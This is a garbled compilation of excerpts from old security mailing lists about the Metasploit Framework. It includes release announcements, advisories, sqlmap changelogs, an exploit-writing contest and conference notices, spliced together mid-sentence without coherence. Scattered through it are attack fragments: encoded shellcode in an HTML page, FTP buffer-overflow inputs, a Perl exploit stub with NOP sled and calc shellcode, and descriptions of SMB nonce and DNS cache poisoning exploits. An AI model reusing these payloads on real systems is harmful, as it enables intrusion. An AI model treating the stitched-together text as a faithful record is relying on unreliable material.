metasploit
METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
New Version of Attack Framework Ready to Pwn
Austin, Texas, January 28th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.1 of
their exploit development and attack framework. The latest version
features a graphical user interface, full support for the Windows
platform, and over 450 modules, including 265 remote exploits.
"Metasploit 3.1 consolidates a year of research and development,
We are excited to announce the immediate availability of version 3.3 of
the Metasploit Framework. This release includes 446 exploits, 216
auxiliary modules, and hundreds of payloads, including an in-memory VNC
service and the Meterpreter. In addition, the Windows payloads now
support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs
were fixed since last year’s release of version 3.2, making this one of
the more well-tested releases yet.
- http://www.metasploit.com/framework/download/
Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com
Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
!pvefindaddr findmsp :
Log data
0BADF00D -------------------------------------------------------------------------
0BADF00D Searching for metasploit pattern references
0BADF00D -------------------------------------------------------------------------
0BADF00D [1] Checking register addresses and contents
0BADF00D ============================================
0BADF00D Register EDI points to Metasploit pattern at position 0
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096
> Exploit ID: CAU-EX-2008-0002
> Release Date: 2008.07.23
> Title: bailiwicked_host.rb
> Description: Kaminsky DNS Cache Poisoning Flaw Exploit
> Tested: BIND 9.4.1-9.4.2
> Attributes: Remote, Poison, Resolver, Metasploit
> Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
> Author/Email: I)ruid <druid (@) caughq.org>
> H D Moore <hdm (@) metasploit.com>
> ===============/========================================================
>
The challenges and responses obtained are saved to the file
'fullcreds.log'.
(ii) msf_smb_weak_nonce.rb
This metasploit module will perform connections to the victim until
the server responds with one of the duplicate challenges stored in
'fullcreds.log'. The module will then send the corresponding response to
gain access to the victim's SMB service.
Finally, after successful exploitation, the module will create the
file 'owned.txt' in the ADMIN$ share (c:\windows) with the following
Hi there,
MSFXDC (MetaSploit Framework eXploits Development Contest) is a
challenge whose main goal is to code the largest number of new
Metasploit Framework exploit modules.
https://www.securinfos.info/metasploit/msfxdc.php
Your mission, if you choose to accept it, is to code new exploit
modules for the Metasploit Framework (latest 3.x version).
Exploit modules must be new regarding the current Metasploit Framework
Downloads and more information: http://www.metasploit.com/
--
After five months of development, version 3.4.0 of the Metasploit
Framework has been released. Since the last major release (3.3) over 100
new exploits have been added and over 200 bugs have been fixed.
This release includes massive improvements to the Meterpreter payload;
both in terms of stability and features, thanks in large part to Stephen
Hi Alexandr!
I added a "monkey-patch" for this in the Metasploit source tree -- even if
you use Metasploit 3.1 with an unpatched version of Ruby, the patched
handler code is loaded into memory on top of the existing module. Since
the msfweb service will bind to 127.0.0.1 by default, this is not a major
risk, but it seemed prudent to patch it anyway.
The patch was pushed to the Metasploit SVN trees, which are used by the
Online Update functionality in the Windows version. Mac OS X users will
Downloads and more information at http://www.metasploit.com/
--
The Metasploit Project is proud to announce the release of the
Metasploit Framework version 3.4.1. As always, you can get it from
our downloads page, for Windows, Linux or as an OS-independent
tarball. This release sees the first official non-Windows Meterpreter
payload, in PHP as discussed last month
(http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html).
password hashes, privileges, databases, dump entire or user-specified
DBMS tables/columns, run their own SQL statement, read or
write either text or binary files on the file system, execute
arbitrary commands on the operating system, establish an out-of-band
stateful connection between the attacker box and the database server
via Metasploit payload stager, database stored procedure buffer
overflow exploitation or SMB relay attack and more.
Changes
=======
approach to penetration testing that does not rely on exploiting known
vulnerabilities. During the talk, we used a combination of new tools and
lesser-known techniques to walk through the process of compromising a
target network. The materials for this talk are now online, including the
slides, white paper, and videos. These materials can be found online at:
- http://metasploit.com/confs/
For those who missed both the talks or couldn't stay for all of one, the
white paper does a good job of covering the things we discussed:
- http://metasploit.com/confs/blackhat2007/tactical_paper.pdf
credentials (Bernardo).
* Support to parse -C (column name(s)) when fetching columns of a
table with --columns: it will enumerate only columns like the provided
one(s) within the specified table (Bernardo).
* Support for takeover features on PostgreSQL 8.4 (Bernardo).
* Enhanced --priv-esc to rely on new Metasploit Meterpreter's
'getsystem' command to elevate privileges of the user running the
back-end DBMS instance to SYSTEM on Windows (Bernardo).
* Automatic support in --os-pwn to use the web uploader/backdoor to
upload and execute the Metasploit payload stager when stacked queries
SQL injection is not supported, for instance on MySQL/PHP and
VNSECON07 ( http://conf.vnsecurity.net/ ), Ho Chi Minh, Vietnam.
You can find the intro and slides + the full-text paper at:
https://www.securinfos.info/VNSECON2007
Covered topics:
* usage, enhancement and exploit modules development for the Metasploit
Framework
* Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF
eXploit Builder
The latest version of the presented tool "MSF eXploit Builder" should be
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018
Application: Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1)
Versions Affected: Ruby
  1.8.4 and all prior versions
  1.8.5-p114 and all prior versions
  1.8.6-p113 and all prior versions
  1.9.0-1 and all prior versions
!ÙÄ* uTXÝÄÙpô]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHQTEPC0C0LKG5GLLKCLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJDMEQHBJKJTGKPTGTC4CEKULKQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP1L6E0F6E4LKQVFPLKG0DLLKBPELNMLKCXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJGBCCQBLBCEPAA",
"d", false, false, 80, false, true, true, 420)
</script>
</html>
Additionally, a Metasploit Framework Module has been written to
demonstrate the vulnerability.
References:
aushack.com advisory
http://www.aushack.com/200708-tumbleweed.txt
Anyway this mail is also for pointing out a new
customizable proof-of-concept which I have written yesterday and that
can be used to fully execute code remotely after having passed the
needed valid parameters (my PoC doesn't contain shellcodes; they must be
provided as an external file in the classical C/Perl/hexadecimal format
like, for example, those available on The Metasploit Project):
http://aluigi.org/poc/quicktimebof.zip
The success of the exploitation depends on various factors, for example
here using the "QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3" link and
Changes
=======
Some of the new features include:
* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
* Implemented the ability to test for and inject into LIKE statements as well;
* Implemented --start and --stop options to set the first and the last
table entry to dump;
* Added a non-interactive/batch-mode (--batch) option to make it easy to
wrap sqlmap in Metasploit and any other tool.
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
- In the hardware hacking area we have a very interesting presentation from
Travis Goodspeed on reverse engineering and exploiting wireless sensors.
Our lineup of brand new training sessions includes a physical security
training by Zac Franken and Adam Laurie entitled "RFID, Access Control and
Biometric Systems", a Metasploit course called "Tactical Exploitation" by
Metasploit creator HD Moore and a course on "Understanding and Deploying
DNSSEC" by Paul Wouters and Patrick Nauber.
As always, it's best to register early for the training of your choice to
make sure there's a place for you - seats are limited. To learn more about
More details are located at:
http://www.informit.com/guides/content.aspx?g=security&seqNum=320
http://www.informit.com/guides/content.aspx?g=security&seqNum=321
MetaSploit module is located at:
http://www.whitewolfsecurity.com/security/metasploit/fileutility.txt
Workaround: Uninstall the software from the PC/Mac.
Vendor Response: Vendor has released an update that fixes only the file
While they were arguing what the meaning of "responsible" is in
"responsible disclosure", I overheard that a critical pre-
authentication Remote Code Execution vulnerability affecting EMC
Documentum was silently reported to EMC in 2006. The vulnerability
was later silently fixed. No credit was given. No credit was taken.
No Metasploit module was developed.
If you are using Documentum to manage your intellectual properties,
you know what you should do. Many critical vulnerabilities were
silently fixed. Your expensive VM tools don't have any information about
HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)
Here is an auxiliary module for metasploit...
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
The POC was tested on Windows XP Pro SP3 w/ Internet Explorer 7 - All patched
Also Windows XP Pro SP2 w/ Internet Explorer 7
By the way, props go out to shinnai for his tool, Roadmap.
Major thanks go out to HD Moore and the Metasploit project/crew =) www.metasploit.com
Thanks sCORPINo =P www.snoop-security.com
The author of this POC is not responsible for any stupid shit you do with it =)
------------------------------------------------------------------------------------------------------------
<html>
Best regards,
RISE Security
Bug traq wrote:
> I bought a new beautiful ACER with windows XP... the first thing i looked at is the Windows XP SP2 without upgrades ... o my fucking GOD... i can exploit it with metasploit !!!!!!!!! i dont believe ... lets upgrade ?? ok ... no more exploitation
> :(
>
> You see ... is the same scenario :)
>
> lol
-----Original Message-----
From: RISE Security [mailto:advisories@risesecurity.org]
# alpha[at]hacker.bz
# Made in Tunisia
my $junk = "\x41" x 96 ; # whatever bytes
my $nop = "\x90" x 20 ; # bla bla xD
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $shellcode =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
And the new versions of the OS use the ASLR mechanism. All this makes the old methods of attack impossible.
But at BlackHat DC 2010 an interesting way to bypass DEP and ASLR in browsers (and not only browsers)
and Just-In-Time compilers was presented. This method is called JIT-SPRAY. But there was no public PoC until now.
In this text we describe how to write a shellcode for the new JIT-Spray attacks and make a universal STAGE 0 shellcode
that gives control to any common shellcode from MetaSploit, for example.
http://www.dsecrg.com/files/pub/pdf/Writing%20JIT-Spray%20Shellcode%20for%20fun%20and%20profit.pdf
As we give much attention to ERP and business application security,
you can also download new exploits for popular client-side business applications